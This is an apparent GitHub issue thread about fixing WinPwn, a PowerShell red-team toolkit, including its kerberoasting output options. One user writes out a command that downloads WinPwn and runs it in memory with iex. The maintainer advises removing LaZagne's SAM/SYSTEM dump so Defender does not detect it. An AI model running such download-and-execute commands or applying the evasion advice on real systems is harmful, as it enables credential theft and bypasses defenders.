Closed sp00ks-git closed 3 years ago
Whoops I‘ll add it again. Domainpasswordspray is also broken atm. Gonna do that tomorrow 👌
Give e9db01a3f0b8479570e076140d2ac1134766bfde a try and tell me if its fixed. LaZagne is also replaced, but its signature won´t last long as always with public tools. It´s better to build your own customized version.
Thanks man.
Just tested on a win10 box and its detected immediately by Defender. See screenshot attached. Interesting that is more about behaviour than the file itself. This is a similar message im getting for my custom mimikataz file. Maybe they have updated defender to look more on behaviour.
One of the first things Lazagne does with the "all" parameter is dumping SAM and SYSTEM hives from the registry to get the SAM-Database credentials. Maybe that is detected, I found many AV/EDR vendors looking for that behaviour in the past. The only method to avoid the detection is to remove the SAM/SYSTEM dump from LaZagne and use for example InternalMonologue for the hashes instead. But I´ll leave that up to you ;-)
Thanks for the support all good now. Can confirm that /nowrap is sorted also.
Yo! Just rechecked option 8 from the menu for kerberoasting and the output loses the /nowrap again, can you update?
For clarity: I downloaded winpwn in memory using: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') Selected Option: 8 viewed output: "Kerberoasting_Rubeus.txt"
Fixed with 3ab6c6c0fcc91f8f98ed2df1de17c7a0592342fb. Only fixed it for the Offline version last time.
Could you re-add /nowrap to the ASREP and Kerberaosting options please! Seems to of gone on at least the offline version.
I find the offline version very useful and use it more often as limited access to the internet is a usual position I'm in.
Thanks!